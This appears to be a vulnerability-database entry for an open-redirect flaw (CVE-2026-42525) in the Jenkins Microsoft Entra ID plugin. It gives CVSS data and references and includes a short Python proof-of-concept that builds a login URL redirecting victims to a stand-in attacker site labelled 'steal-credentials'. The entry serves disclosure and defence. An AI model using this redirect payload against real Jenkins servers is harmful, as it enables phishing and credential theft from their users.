CVE-2026-42525

Description

Jenkins Microsoft Entra ID (previously Azure AD) Plugin 666.v6060de32f87d and earlier does not restrict the redirect URL after login, allowing attackers to perform phishing attacks.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jenkins:azure_ad:*:*:*:*:*:jenkins:*:* - VULNERABLE

Jenkins Microsoft Entra ID Plugin 666.v6060de32f87d 及更早版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-42525: Open Redirect in Jenkins Microsoft Entra ID Plugin
# This script demonstrates how an attacker can craft a malicious URL to redirect users.

import urllib.parse

def generate_malicious_url(jenkins_base_url, malicious_target):
    """
    Generates a malicious URL exploiting the open redirect vulnerability.
    Note: The specific parameter name might vary based on plugin configuration,
    commonly 'from', 'redirect', or 'redirectUri' in Jenkins flows.
    """
    # Endpoint handling the login redirection
    login_endpoint = "/securityRealm/commenceLogin" 
    
    # Constructing the payload
    params = {
        "from": malicious_target  # Vulnerable parameter
    }
    
    full_url = f"{jenkins_base_url}{login_endpoint}?{urllib.parse.urlencode(params)}"
    return full_url

if __name__ == "__main__":
    target = "http://jenkins.example.com"
    evil_site = "http://attacker-controlled-site.com/steal-credentials"
    
    exploit_url = generate_malicious_url(target, evil_site)
    print(f"[+] Malicious Link generated:\n{exploit_url}")
    print("\n[+] When a user clicks this link and logs in, they will be redirected to the evil site.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42525
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42525
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42525/
[4] VulDB https://vuldb.com/cve/CVE-2026-42525
[5] https://www.jenkins.io/security/advisory/2026-04-29/#SECURITY-3760

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42525", "sourceIdentifier": "[email protected]", "published": "2026-04-29T14:16:19.557", "lastModified": "2026-05-05T14:25:14.963", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins Microsoft Entra ID (previously Azure AD) Plugin 666.v6060de32f87d and earlier does not restrict the redirect URL after login, allowing attackers to perform phishing attacks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:azure_ad:*:*:*:*:*:jenkins:*:*", "versionEndIncluding": "666.v6060de32f87d", "matchCriteriaId": "E9C13250-934D-47A2-B273-F7F5D604507D"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2026-04-29/#SECURITY-3760", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}